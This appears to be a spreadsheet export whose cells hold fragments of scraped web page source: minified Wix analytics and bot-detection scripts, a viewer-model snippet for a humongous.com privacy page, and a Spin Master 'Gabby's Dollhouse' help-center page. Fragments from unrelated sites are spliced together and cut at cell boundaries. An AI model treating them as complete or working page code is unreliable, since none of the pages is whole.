&lt;script data-url="https://static.parastorage.com/services/wix-thunderbolt/dist/ab-test-compilation/bi-common.inline.8fa1962d.bundle.min.js"&gt;"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[142],{19108:function(e,t,n){n.d(t,{e:function(){return v}});var i=n(82808),r=n(3575);const o=null;function s([e,t]){return t!==o&amp;&amp;`${e}=${t}`}function a(){const e=document.cookie.match(/_wixCIDX=([^;]*)/);return e&amp;&amp;e[1]}function c(e){if(!e)return o;const t=new URL(decodeURIComponent(e));return t.search="?",encodeURIComponent(t.href)}var d=function(e,{eventType:t,ts:n,tts:i,extra:r=""},d,u){var l;const p=function(e){const t=e.split("&amp;").reduce(((e,t)=&gt;{const[n,i]=t.split("=");return Object.assign(Object.assign({},e),{[n]:i})}),{});return(e,n)=&gt;void 0!==t[e]?t[e]:n}(r),m=(f=d,e=&gt;void 0===f[e]?o:f[e]);var f;let h=!0;const v=null===window||void 0===window?void 0:window.consentPolicyManager;if(v){const e=v.getCurrentConsentPolicy();if(e){const{policy:t}=e;h=!(t.functional&amp;&amp;t.analytics)}}const g=m("requestUrl"),w={src:"29",evid:"3",viewer_name:m("viewerName"),caching:m("caching"),client_id:h?o:a(),dc:m("dc"),microPop:m("microPop"),et:t,event_name:e?encodeURIComponent(e):o,is_cached:m("isCached"),is_platform_loaded:m("is_platform_loaded"),is_rollout:m("is_rollout"),ism:m("isMesh"),isp:0,isjp:m("isjp"),iss:m("isServerSide"),ssr_fb:m("fallbackReason"),ita:p("ita",d.checkVisibility()?"1":"0"),mid:h?o:(null==u?void 0:u.siteMemberId)||o,msid:m("msId"),pid:p("pid",o),pn:p("pn","1"),ref:document.referrer&amp;&amp;!h?encodeURIComponent(document.referrer):o,sar:h?o:p("sar",screen.availWidth?`${screen.availWidth}x${screen.availHeight}`:o),sessionId:h&amp;&amp;v?o:m("sessionId"),siterev:d.siteRevision||d.siteCacheRevision?`${d.siteRevision}-${d.siteCacheRevision}`:o,sr:h?o:p("sr",screen.width?`${screen.width}x${screen.height}`:o),st:m("st"),ts:n,tts:i,url:h?c(g):g,v:(null===window||void 0===window?void 0:window.thunderboltVersion)||"0.0.0",vid:h?o:(null==u?void 0:u.visitorId)||o,bsi:h?o:(null==u?void 0:u.bsi)||o,vsi:m("viewerSessionId"),wor:h||!window.outerWidth?o:`${window.outerWidth}x${window.outerHeight}`,wr:h?o:p("wr",window.innerWidth?`${window.innerWidth}x${window.innerHeight}`:o),_brandId:(null===(l=d.commonConfig)||void 0===l?void 0:l.brand)||o,nt:p("nt",o)};return`https://frog.wix.com/bt?${Object.entries(w).map(s).filter(Boolean).join("&amp;")}`},u=n(48709),l=n(20506),p=n(76491),m=n(18788);const f={WixSite:1,UGC:2,Template:3};var h=()=&gt;{const{fedops:e,viewerModel:{siteFeaturesConfigs:t,requestUrl:n,site:i,fleetConfig:r,commonConfig:o,interactionSampleRatio:s}}=window,a=(({requestUrl:e,interactionSampleRatio:t})=&gt;{const n=new URL(e).searchParams;return n.has("sampleEvents")?"true"===n.get("sampleEvents"):Math.random()&lt;(t?1-t:.9)})({requestUrl:n,interactionSampleRatio:s}),c=(0,u. Q)(window)||(0,p.f)()||(0,l.d)()||(({seo:e})=&gt;(null==e?void 0:e.isInSEO)?"seo":"")(t);return Object.assign(Object.assign({suppressbi:n.includes("suppressbi=true"),initialTimestamp:window.initialTimestamps.initialTimestamp,initialRequestTimestamp:window.initialTimestamps.initialRequestTimestamp,viewerSessionId:e.vsi,viewerName:i.isResponsive?"thunderbolt-responsive":"thunderbolt",siteRevision:String(i.siteRevision),msId:i.metaSiteId,is_rollout:0===r.code||1===r.code?r.code:null,is_platform_loaded:0,requestUrl:encodeURIComponent(n),sessionId:String(i.sessionId),btype:c,isjp:!!c,dc:i.dc,siteCacheRevision:"__siteCacheRevision__",checkVisibility:(()=&gt;{let e=!0;function t(){e=e&amp;&amp;!0!==document.hidden}return document.addEventListener("visibilitychange",t,{passive:!0}),t(),()=&gt;(t(),e)})()},(0,m._)(document.cookie,(()=&gt;performance.getEntriesByType("navigation")[0].serverTiming||[]))),{isMesh:1,st:</t>
  </si>
  <si>
    <t>f[i.siteType]||0,commonConfig:o,muteThunderboltEvents:a})};const v=function(){const e=h(),t={};let n=1;const o=(i,o,s={})=&gt;{const a=Date.now(),c=Math.round(performance.now()),u=a-e.initialTimestamp;if(function(e,t){if(t&amp;&amp;performance.mark){const n=`${t} (beat ${e})`;performance.mark(n)}}(i,o),e.suppressbi||window.__browser_deprecation__)return;const{pageId:l,pageNumber:p=n,navigationType:m}=s;let f=`&amp;pn=${p}`;l&amp;&amp;(f+=`&amp;pid=${l}`),m&amp;&amp;(f+=`&amp;nt=${m}`);const h=d(o,{eventType:i,ts:u,tts:c,extra:f},e,t);(0,r. Z)(h)};return{sendBeat:o,reportBI:function(e,t){!function(e,t){const n=t?`${e} - ${t}`:e,i="end"===t?`${e} - start`:null;performance.mark(n),performance.measure&amp;&amp;i&amp;&amp;performance.measure(`\u2b50${e}`,i,n)}(e,t)},wixBiSession:e,sendBeacon:r.Z,setDynamicSessionData:({visitorId:e,siteMemberId:n,bsi:i})=&gt;{t.visitorId=e||t.visitorId,t.siteMemberId=n||t.siteMemberId,t.bsi=i||t.bsi},reportPageNavigation:function(e){n+=1,o(i.sT.PAGE_NAVIGATION,"page navigation start",{pageId:e,pageNumber:n})},reportPageNavigationDone:function(e,t){o(i.sT.PAGE_NAVIGATION_DONE,"page navigation complete",{pageId:e,pageNumber:n,navigationType:t}),t!==i.$7.DYNAMIC_REDIRECT&amp;&amp;t!==i.$7.NAVIGATION_ERROR&amp;&amp;t!==i.$7.CANCELED||(n-=1)}}}();window.bi=v,v.sendBeat(1,"Init")},85430:function(e,t,n){var i=n(48709),r=n(76491),o=n(20506),s=n(18788);var a=n(3575);!function(){const{site:e,rollout:t,fleetConfig:n,requestUrl:c,isInSEO:d,frogOnUserDomain:u}=window.fedops.data,l=(0,i.Q)(window)||(0,r.f)()||(0,o.d)()||(d?"seo":""),p=!!l,{isCached:m,caching:f,microPop:h}=(0,s._)(document.cookie,(()=&gt;performance.getEntriesByType("navigation")[0].serverTiming||[])),v={WixSite:1,UGC:2,Template:3}[e.siteType]||0,g=e.isResponsive?"thunderbolt-responsive":"thunderbolt",{isDACRollout:w,siteAssetsVersionsRollout:b}=t,I=w?1:0,_=b?1:0,R=0===n.code||1===n.code?n.code:null,T=Date.now()-window.initialTimestamps.initialTimestamp,x=Math.round(performance.now()),{visibilityState:S}=document,N=S,{fedops:y,addEventListener:E,thunderboltVersion:A}=window;y.apps=y.apps||{},y.apps[g]={startLoadTime:x},y.sessionId=e.sessionId,y.vsi="xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,(e=&gt;{const t=16*Math.random()|0;return("x"===e?t:3&amp;t|8).toString(16)})),y.is_cached=m,y.phaseStarted=$(28),y.phaseEnded=$(22),performance.mark("[cache] "+f+(h?" ["+h+"]":"")),y.reportError=e=&gt;{const t=(null==e?void 0:e.reason)||(null==e?void 0:e.message);t?C(26,`&amp;errorInfo=${t}&amp;errorType=load`):e.preventDefault()},E("error",y.reportError),E("unhandledrejection",y.reportError);let O=!1;function C(t,n=""){if(c.includes("suppressbi=true"))return;const i=(u?e.externalBaseUrl.replace(/^https?:\/\//,"")+"/_frog":"//frog.wix.com")+"/bolt-performance?src=72&amp;evid="+t+"&amp;appName="+g+"&amp;is_rollout="+R+"&amp;is_sav_rollout="+_+"&amp;is_dac_rollout="+I+"&amp;dc="+e.dc+(h?"&amp;microPop="+h:"")+"&amp;is_cached="+m+"&amp;msid="+e.metaSiteId+"&amp;session_id="+window.fedops.sessionId+"&amp;ish="+p+"&amp;isb="+p+(p?"&amp;isbr="+l:"")+"&amp;vsi="+window.fedops.vsi+"&amp;caching="+f+(O?",browser_cache":"")+"&amp;pv="+N+"&amp;pn=1&amp;v="+A+"&amp;url="+encodeURIComponent(c)+"&amp;st="+v+`&amp;ts=${T}&amp;tsn=${x}`+n;(0,a.</t>
  </si>
  <si>
    <t>Z)(i)}function $(e){return(t,n)=&gt;{const i=`&amp;name=${t}&amp;duration=${Date.now()-T}`,r=n&amp;&amp;n.paramsOverrides?Object.keys(n.paramsOverrides).map((e=&gt;e+"="+n.paramsOverrides[e])).join("&amp;"):"";C(e,r?`${i}&amp;${r}`:i)}}E("pageshow",(({persisted:e})=&gt;{e&amp;&amp;(O||(O=!0,y.is_cached=!0))}),!0),window.__browser_deprecation__||C(21,`&amp;platformOnSite=${window.fedops.data.platformOnSite}`)}()},70090:function(e,t,n){n.d(t,{h:function(){return o}});var i=n(47737);const r=({useBatch:e=!0,publishMethod:t=i.PublishMethods. Auto,endpoint:n,muteBi:r=!1,biStore:o,sessionManager:s,fetch:a,factory:c})=&gt;c(Object.assign({useBatch:e,publishMethod:t,endpoint:n},o.frogUrlOverride?{host:o.frogUrlOverride.replace(/^https?:\/\//,"")+"/_frog"}:{})).setMuted(r).withUoUContext({msid:o.msid}).withNonEssentialContext({visitorId:()=&gt;s.getVisitorId(),siteMemberId:()=&gt;s.getSiteMemberId()}).updateDefaults(Object.assign({vsi:o.viewerSessionId,_av:`thunderbolt-${o.viewerVersion}`,isb:o.is_headless},o.is_headless&amp;&amp;{isbr:o.is_headless_reason})),o={createBaseBiLoggerFactory:r,createBiLoggerFactoryForFedops:e=&gt;{const{biStore:{session_id:t,initialTimestamp:n,initialRequestTimestamp:i,dc:o,microPop:s,is_headless:a,isCached:c,pageData:d,rolloutData:u,caching:l,checkVisibility:p=(()=&gt;""),viewerVersion:m,requestUrl:f,st:h},muteBi:v=!1}=e;return r(Object.assign(Object.assign({},e),{muteBi:v})).updateDefaults({ts:()=&gt;Date.now()-n,tsn:()=&gt;function({initialRequestTimestamp:e}){return"undefined"==typeof window?Math.round(performance.now()+(performance.timeOrigin-e)):Math.round(performance.now())}({initialRequestTimestamp:i}),dc:o,microPop:s,caching:l,session_id:t,st:h,url:f||d.pageUrl,ish:a,pn:d.pageNumber,isFirstNavigation:1===d.pageNumber,pv:p,pageId:d.pageId,isServerSide:!1,is_lightbox:d.isLightbox,is_cached:c,is_sav_rollout:u.siteAssetsVersionsRollout?1:0,is_dac_rollout:u.isDACRollout?1:0,v:m})}}},73025:function(e,t,n){n.d(t,{b:function(){return o}});var i=n(2687),r=n(92639);const o=({biLoggerFactory:e,customParams:t={},phasesConfig:n="SEND_ON_FINISH",appName:o="thunderbolt",presetType:s=i.w.BOLT,reportBlackbox:a=!1,paramsOverrides:c={},factory:d,muteThunderboltEvents:u=!1})=&gt;{const l=d(o,{presetType:s,phasesConfig:n,isPersistent:!0,isServerSide:!1,reportBlackbox:a,customParams:t,biLoggerFactory:e,paramsOverrides:c}),{interactionStarted:p,interactionEnded:m,appLoadingPhaseStart:f,appLoadingPhaseFinish:h}=l,v=(e,t)=&gt;{const n=!!(null==t?void 0:t.appId)&amp;&amp;!r. Fs.has(t.appId),i=r.FD.has(e),o=r.cO.has(e);return i||n||!o&amp;&amp;!u};return l.interactionStarted=(e,...t)=&gt;{if(v(e))return p.call(l,e,...t);try{performance.mark(`${e} started`)}catch(e){}return{timeoutId:0}},l.interactionEnded=(e,...t)=&gt;{if(v(e))m.call(l,e,...t);else try{performance.mark(`${e} ended`)}catch(e){}},l.appLoadingPhaseStart=(e,t,...n)=&gt;{if(v(e,t))f.call(l,e,t,...n);else try{performance.mark(`${e} started`)}catch(e){}},l.appLoadingPhaseFinish=(e,t,...n)=&gt;{if(v(e,t))h.call(l,e,t,...n);else try{performance.mark(`${e} finished`)}catch(e){}},l}},19926:function(e,t,n){n.d(t,{y:function(){return i}});const</t>
  </si>
  <si>
    <t>i=e=&gt;({reportAsyncWithCustomKey:(t,n,i)=&gt;e.reportAsyncWithCustomKey(t,n,i),runAsyncAndReport:(t,n)=&gt;e.runAsyncAndReport(t,n),runAndReport:(t,n)=&gt;e.runAndReport(t,n),reportError:t=&gt;{e.captureError(t,{tags:{feature:"thunderbolt-commons",clientMetricsReporterError:!0}})},meter:t=&gt;{e.meter(t)},histogram:(e,t)=&gt;{}})},18788:function(e,t,n){n.d(t,{_:function(){return i}});const i=(e,t)=&gt;{let n,i="none",r=e.match(/ssr-caching="?cache[,#]\s*desc=([\w-]+)(?:[,#]\s*varnish=(\w+))?(?:[,#]\s*dc[,#]\s*desc=([\w-]+))?(?:"|;|$)/);if(!r&amp;&amp;window. PerformanceServerTiming){const e=(e=&gt;{let t,n;try{t=e()}catch(e){t=[]}const i=[];return t.forEach((e=&gt;{switch(e.name){case"cache":i[1]=e.description;break;case"varnish":i[2]=e.description;break;case"dc":n=e.description}})),{microPop:n,matches:i}})(t);n=e.microPop,r=e.matches}if(r&amp;&amp;r.length&amp;&amp;(i=`${r[1]},${r[2]||"none"}`,n||(n=r[3])),"none"===i){const e="undefined"!=typeof performance?performance.timing:null;e&amp;&amp;e.responseStart-e.requestStart==0&amp;&amp;(i="browser")}return Object.assign({caching:i,isCached:0===i.indexOf("hit")},n?{microPop:n}:{})}},69671:function(e,t,n){n.d(t,{P:function(){return r}});var i=n(43426);function r(e){return e.requestUrl.includes("wix-viewer-model=")?e.requestUrl.includes(`${i.c}=react-native`)?"thunderbolt-renderer-mobile":"thunderbolt-renderer":e.site.isResponsive?"thunderbolt-responsive":"thunderbolt"}},48709:function(e,t,n){n.d(t,{Q:function(){return i}});const</t>
  </si>
  <si>
    <t>i=e=&gt;{const{userAgent:t}=e.navigator;return/instagram.+google\/google/i.test(t)?"":/bot|google(?!play)|phantom|crawl|spider|headless|slurp|facebookexternal|Lighthouse|PTST|^mozilla\/4\.0$|^\s*$/i.test(t)?"ua":""}},76491:function(e,t,n){n.d(t,{f:function(){return i}});const i=()=&gt;{try{if(window.self===window.top)return""}catch(e){}return"iframe"}},20506:function(e,t,n){n.d(t,{d:function(){return i}});const i=()=&gt;{var e;if(!Function.prototype.bind)return"bind";const{document:t,navigator:n}=window;if(!t||!n)return"document";const{webdriver:i,userAgent:r,plugins:o,languages:s}=n;if(i)return"webdriver";if(!o||Array.isArray(o))return"plugins";if(null===(e=Object.getOwnPropertyDescriptor(o,"0"))||void 0===e?void 0:e.writable)return"plugins-extra";if(!r)return"userAgent";if(r.indexOf("Snapchat")&gt;0&amp;&amp;t.hidden)return"Snapchat";if(!s||0===s.length||!Object.isFrozen(s))return"languages";try{throw Error()}catch(e){if(e instanceof Error){const{stack:t}=e;if(t&amp;&amp;/ (\(internal\/)|(\(?file:\/)/.test(t))return"stack"}}return""}},3575:function(e,t,n){n.d(t,{Z:function(){return i}});const i=e=&gt;{var t,n;let i=!1;if(!((null===(t=window.viewerModel)||void 0===t?void 0:t.experiments["specs.thunderbolt.useImgNotBeacon"])||(null===(n=window.viewerModel)||void 0===n?void 0:n.experiments["specs.thunderbolt.checkIOSToAvoidBeacon"])&amp;&amp;(()=&gt;{var e;return/\(iP(hone|ad|od);/i.test(null===(e=null===window||void 0===window?void 0:window.navigator)||void 0===e?void 0:e.userAgent)})()))try{i=navigator.sendBeacon(e)}catch(e){}i||((new Image).src=e)}},37647:function(e,t,n){n.r(t),n.d(t,{createBiReporter:function(){return s},site:function(){return a}});var i=n(58629),r=n(69671);const o=(...e)=&gt;console.log("[TB] ",...e);function s(e=o,t=o,n=(()=&gt;{}),i=o,r=o){return{reportBI:e,sendBeat:t,setDynamicSessionData:n,reportPageNavigation:i,reportPageNavigationDone:r}}const a=({biReporter:e,wixBiSession:t,viewerModel:n})=&gt;o=&gt;{o(i.sK).toConstantValue(t),o(i.Li).toConstantValue(e),o(i.fi).toConstantValue((0,r.</t>
  </si>
  <si>
    <t>P)(n))}},82808:function(e,t,n){var i,r;n.d(t,{$7:function(){return r},i7:function(){return o},sT:function(){return i}}),function(e){e[e. START=1]="START",e[e. VISIBLE=2]="VISIBLE",e[e.</t>
  </si>
  <si>
    <t>PAGE_FINISH=33]="PAGE_FINISH",e[e.FIRST_CDN_RESPONSE=4]="FIRST_CDN_RESPONSE",e[e.TBD=-1]="TBD",e[e. PAGE_NAVIGATION=101]="PAGE_NAVIGATION",e[e. PAGE_NAVIGATION_DONE=103]="PAGE_NAVIGATION_DONE"}(i||(i={})),function(e){e[e.NAVIGATION=1]="NAVIGATION",e[e.DYNAMIC_REDIRECT=2]="DYNAMIC_REDIRECT",e[e.</t>
  </si>
  <si>
    <t>INNER_ROUTE=3]="INNER_ROUTE",e[e. NAVIGATION_ERROR=4]="NAVIGATION_ERROR",e[e. CANCELED=5]="CANCELED"}(r||(r={}));const o={1:"page-navigation",2:"page-navigation-redirect",3:"page-navigation-inner-route",4:"navigation-error",5:"navigation-canceled"}},58629:function(e,t,n){n.d(t,{Li:function(){return i},fi:function(){return o},sK:function(){return</t>
  </si>
  <si>
    <t>r}});const i=Symbol.for("BI"),r=Symbol.for("WixBiSessionSymbol"),o=Symbol.for("appName")}}]);
//# sourceMappingURL=https://static.parastorage.com/services/wix-thunderbolt/dist/ab-test-compilation/bi-common.inline.8fa1962d.bundle.min.js.map&lt;/script&gt;
&lt;script data-url="https://static.parastorage.com/services/wix-thunderbolt/dist/ab-test-compilation/sendFedopsLoadStarted.inline.1c8fd250.bundle.min.js"&gt;"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[5987],{},function(n){n. O(0,[142],(function(){return p=85430,n(n.s=p);var p}));n.O()}]);&lt;/script&gt;
  &lt;!--</t>
  </si>
  <si>
    <t>Polyfills check --&gt;
  &lt;script&gt;
    if (
      typeof Promise === 'undefined' ||
      typeof Set === 'undefined' ||
      typeof Object.assign === 'undefined' ||
      typeof Array.from === 'undefined' ||
      typeof Symbol === 'undefined'
    ) {
      // send bi in order to detect the browsers in which polyfills are not working
      window.fedops.phaseStarted('missing_polyfills')
    }
  &lt;/script&gt;
  &lt;!--</t>
  </si>
  <si>
    <t>Viewer Model --&gt;
  &lt;script type="application/json" id="wix-viewer-model"&gt;{"siteAssetsTestModuleVersion":"1.334.0","requestUrl":"https:\/\/www.humongous.com\/privacy","siteFeatures":["assetsLoader","businessLogger","captcha","commonConfig","componentsLoader","componentsRegistry","consentPolicy","cyclicTabbing","dynamicPages","environment","locationWixCodeSdk","navigationManager","navigationPhases","ooi","pages","renderer","reporter","router","scrollRestoration","seoWixCodeSd</t>
  </si>
  <si>
    <t>css2?family=Montserrat:wght@100;300;400;600;700&amp;display=swap" rel="stylesheet"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/cookieconsent.css?v=1681340141"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/master.min.css?v=1681340141"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</si>
  <si>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
&lt;html&gt;
&lt;head&gt;
  &lt;title&gt;Privacy Policy — Gabby&amp;#x27;s Dollhouse Help Center&lt;/title&gt;
&lt;meta name="description" content="Children’s Privacy Notice Spin Master Ltd hopes that you have as much fun playing our mobile games as we do creating them. Nothing is more important"&gt;
&lt;meta name="robots" content="index, follow"&gt;
&lt;meta http-equiv="content-type" content="text/html; charset=utf-8" /&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"&gt;
&lt;link rel="icon" href="32/"&gt;
&lt;style&gt;
    :root {
    --error-color: #e94b4b;
    --header-bg-color: #F0F2F4;
    --header-text-color: #000000;
    --header-text-color-25-opacity: #00000040;
    --footer-bg-color: #F0F2F4;
    --footer-text-color: #000000;
    --footer-text-color-10-opacity: #0000001A;
    --footer-text-color-40-opacity: #00000066;
    --footer-text-color-60-opacity: #00000099;
    --primary-text-color: #111827;
    --primary-text-color-5-opacity: #1118270D;
    --primary-text-color-10-opacity: #1118271A;
    --primary-text-color-20-opacity: #11182733;
    --primary-text-color-50-opacity: #11182780;
    --primary-text-color-80-opacity: #111827CC;
    --accent-color: #453FB9;
    --action-color: #453FB9;
    --action-color-5-opacity: #453FB90D;
    --action-color-20-opacity: #453FB933;
    --action-color-80-opacity: #453FB9CC;
    --primary-bg-color: #F0F2F4;
    --content-bg-color: #FFFFFF;
    --content-bg-color-85-opacity: #FFFFFFD9;
    --secondary-bg-color: #E8ECEF;
    --greeting-text-color: #FFFFFF;
    --banner-image-size-desktop: 540px;
    --banner-image-size-mobile-portrait: 296px;
    --banner-image-size-mobile-landscape: 188px;
    --greeting-text-font-size-desktop: 48px;
    --greeting-text-font-size-mobile: 24px;
    --cover-background: #453FB9;
    --cover-background-gradient: ;
    --cover-bg-desktop: #453FB9;
    --cover-bg-portrait: #453FB9;
    --cover-bg-landscape: #453FB9;
  }
&lt;/style&gt;
  &lt;!--</t>
  </si>
  <si>
    <t>This files parse CSS entry files for webpack &amp; insert as style tag --&gt;
  &lt;link href="https://d2duuy9yo5pldo.cloudfront.net/hc-themes/theme2/latest/static/style.fed2f44d536d514f3d2f.css" rel="stylesheet"&gt;
&lt;/head&gt;
&lt;body class="" data-qa="faq-page"&gt;
  &lt;template
  class="js-hc-template"
  data-domain="spinmaster"
  data-lang="en"
  data-pagesource="faq"
  data-appid="spinmaster_app_20191118215419960-f76b2f4f05484fa"
  data-platformid="spinmaster_platform_20160407194746219-4659d88b6b576a6"
  data-hcmode="hc"&gt;&lt;/template&gt;
  &lt;template class="js-web-template"&gt;&lt;/template&gt;
&lt;header class="header-section js-web-header " &gt;
  &lt;div class="header-left-container"&gt;
    &lt;div class="brand-logo"&gt;
      &lt;a class="company-link js-company-link" rel="noreferrer" target="_blank" &gt;
          &lt;img src="https://d2duuy9yo5pldo.cloudfront.net/dashboard-resources/320/default-logo.webp"
            class="header-brand-logo js-header-brand-logo js-optimized-img"
            data-fallback-src="https://d2duuy9yo5pldo.cloudfront.net/dashboard-resources/default-logo.png" data-loaded-from="original"/&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;a class="header-brand-name js-header-brand-name" 
      href="/hc/en/37-gabby-s-dollhouse/?p&amp;#x3D;web&amp;amp;s&amp;#x3D;privacy-policy&amp;amp;f&amp;#x3D;privacy-policy&amp;amp;l&amp;#x3D;en"&gt;Spin Master Support&lt;/a&gt;
  &lt;/div&gt;
&lt;/header&gt;
    &lt;div class="empty-dropdown-header js-empty-dropdown-header "&gt;&lt;/div&gt;
    &lt;div
      class="dropdown-header js-dropdown-header
      "
      &gt;
      &lt;div class="dropdown-header-container"&gt;
            &lt;static-dropdown class="hc-static-dropdown--apps-dropdown" type="widget" is-rtl="false"
                    modal-title="Choose an app" placeholder="Search" searchable="true" direction="right" width="240px"&gt;
     &lt;script type="application/json"&gt;
          [{"logo":"/improxy?url=https%3A%2F%2Flh3.googleusercontent.com%2Fv-2PnJg4WwDeJtcl9Wxb6fPcOJNQsYQIn_2n_YGn0vz9HH2BYMK9cMmmWfz3DjEkgA%3Dw300&amp;size=68x68&amp;kot=dPWPrRpwaav2dxWjRYlnGOKU6e7ZjLBDMg3JhtRgZ2A%3D","id":"spinmaster_app_20170323201513515-dc0201cc8ce2da8","title":"Air Hogs: DR1 FPV Race Drone™","slug":"air-hogs-dr1-fpv-race-drone","selected":false,"url":"/hc/en/15-air-hogs-dr1-fpv-race-drone/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"logo":"/improxy?url=http%3A%2F%2Fis1.mzstatic.com%2Fimage%2Fthumb%2FPurple128%2Fv4%2Fed%2F20%2Fce%2Fed20ce3b-422c-2726-4ddc-24ba937c5869%2Fsource%2F512x512bb.jpg&amp;size=68x68&amp;kot=oeVr9UMUB1G%2BCT3P70JltkKTNDvPW925Bc8qaaytQ4g%3D","id":"spinmaster_app_20170504010816838-704ed4ba34e600b","title":"Air Hogs: FPV Race Car™","slug":"air-hogs-fpv-race-car","selected":false,"url":"/hc/en/16-air-hogs-fpv-race-car/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"logo":"/improxy?url=http%3A%2F%2Fis3.mzstatic.com%2Fimage%2Fthumb%2FPurple22%2Fv4%2Fd0%2F8c%2Fc0%2Fd08cc066-2415-56cf-7f57-6819e9a79356%2Fsource%2F512x512bb.jpg&amp;size=68x68&amp;kot=mg6XJ0PXWDOwAhNvbKq%2Bez8ORUPQWfdCX27xUHpTA5I%3D","id":"spinmaster_app_20160427213400407-e888e58c2aabf7d","title":"Air Hogs: Helix Sentinel™","slug":"air-hogs-helix-sentinel","selected":false,"url":"/hc/en/5-air-hogs-helix-sentinel/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"logo":"/improxy?url=https%3A%2F%2Flh3.googleusercontent.com%2FPpya9FRe9WoXhP52Zjs6whaCYu3PFG8CzpQhUlWkpZd3lpHvOfq9jhG9Nf-2Jb0Wtg%3Dw300&amp;size=68x68&amp;kot= Rwo1V219j%2B3YBfac%2FJDRk%2FHbexBjV1S0O8Mw%2FlArUDo%3D","id":"spinmaster_app_20160924222400010-4c7105eee718d48","title":"Air Hogs: X-Stream","slug":"air-hogs-x-stream","selected":false,"url":"/hc/en/10-air-hogs-x-stream/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"logo":"/improxy?url=https%3A%2F%2Flh3.googleusercontent.com%2FeiY8ccf53GEA2QV2istk3t1MZbHihWP-AUOsLnry4I11arOxxpTPCCzG25RqYWdPuQ%3Dw300&amp;size=68x68&amp;kot=8wlcnfx194yEFBt%2F%2FxXkGO%2FcNktviKoyG6bfz1s9F4c%3D","id":"spinmaster_app_20160407194821964-91408991a1d3cd5","title":"Air Hogs: Mission Drone™","slug":"air-hogs-mission-drone","selected":false,"url":"/hc/en/3-air-hogs-mission-drone/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"logo":"/improxy?url=https%3A%2F%2Fis5-ssl.mzstatic.com%2Fimage%2Fthumb%2FPurple128%2Fv4%2F44%2Fd7%2F4d%2F44d74dcd-a073-428a-5c67-b569022b4eaf%2Fsource%2F512x512bb.jpg&amp;size=68x68&amp;kot=g2%2BgstwkdFLLXFuzeGRKJICsh0N%2BOC2%2BLhDohxj9NeI%3D","id":"spinmaster_app_20180508214902449-025b4e1b3321ca8","title":"Bakugan","slug":"bakugan","selected":false,"url":"/hc/en/26-bakugan/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"logo":"/improxy?url=https%3A%2F%2Fis2-ssl.mzstatic.com%2Fimage%2Fthumb%2FPurple115%2Fv4%2Fcc%2F23%2F19%2Fcc23196f-8ead-92b5-5c68-da38cc3419a2%2Fsource%2F512x512bb.jpg&amp;size=68x68&amp;kot=OjvrYnYkf16Jh1soVwnv8KrA6ucIJOLVrWlYC1KLUD8%3D","id":"spinmaster_app_20180109045811093-d550d2468546e24","title":"Boxer","slug":"boxer","selected":false,"url":"/hc/en/25-boxer/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"logo":"/improxy?url=https%3A%2F%2Fis2-ssl.mzstatic.com%2Fimage%2Fthumb%2FPurple123%2Fv4%2F69%2F8d%2F83%2F698d8391-ece5-6c2d-6a4c-e3a5ee6a5fd0%2Fsource%2F512x512bb.jpg&amp;size=68x68&amp;kot=WLCeZiBXHJq8LsyC5%2BH%2Fg%2FMUd3HvWvvQpssaHm9u7tk%3D","id":"spinmaster_app_20181126182514256-6142cf785222f64","title":"Dragamonz","slug":"dragamonz","selected":false,"url":"/hc/en/27-dragamonz/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"logo":"/improxy?url=https%3A%2F%2Flh3.googleusercontent.com%2FIYVh7Ndivf2brgWD39Tijf37VCbuw-S5uJv3U7QyQlbbUb42Dp_9y6Htm2PgwjqWNNo%3Dw300&amp;size=68x68&amp;kot=xvnX8bvcbJ%2FeT2shgomP%2FjNYKyvZUXF5okY6W6e%2FLCk%3D","id":"spinmaster_app_20170113224229780-8b30e9b14c57cdd","title":"Etch A Sketch® It!","slug":"etch-a-sketch-it","selected":false,"url":"/hc/en/12-etch-a-sketch-it/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"logo":"/improxy?url=https%3A%2F%2Flh3.googleusercontent.com%2F0qzt3BgXv4M9oeoQTsDQ9y5qv8dsBr6pHT4J_oPhcbfbtr2WAYsThpUHYoqsz5rYkDQ%3Ds180-rw&amp;size=68x68&amp;kot=jvGcxjyui614rW%2BmWCK%2F2J%2BNpZdUNerTk0UdUXqjVOY%3D","id":"spinmaster_app_20191118215419960-f76b2f4f05484fa","title":"Gabby's Dollhouse","slug":"gabby-s-dollhouse","selected":true,"url":"/hc/en/37-gabby-s-dollhouse/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"logo":"/improxy?url=https%3A%2F%2Fis2-ssl.mzstatic.com%2Fimage%2Fthumb%2FPurple123%2Fv4%2Fd3%2F90%2Fee%2Fd390ee2f-5611-8a2d-96cf-57f227e1209d%2Fsource%2F512x512bb.jpg&amp;size=68x68&amp;kot=gRaZOZk0enLYS5B1wheraF9XAtGZ%2FiunKJjUPLethZ0%3D","id":"spinmaster_app_20190214190639191-7eae384a29dd5a1","title":"Gifeez","slug":"gifeez","selected":false,"url":"/hc/en/32-gifeez/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"logo":"/improxy?url=http%3A%2F%2Fis4.mzstatic.com%2Fimage%2Fthumb%2FPurple117%2Fv4%2F8c%2Fba%2Fef%2F8cbaef42-8e06-557c-44fa-de879511770a%2Fsource%2F512x512bb.jpg&amp;size=68x68&amp;kot=NxG1LhRxcwWMWQdFhVb1jpYak%2BPlvOXKxFpy347ExR0%3D","id":"spinmaster_app_20170301201014612-51c30058c82a323","title":"Hatchimals 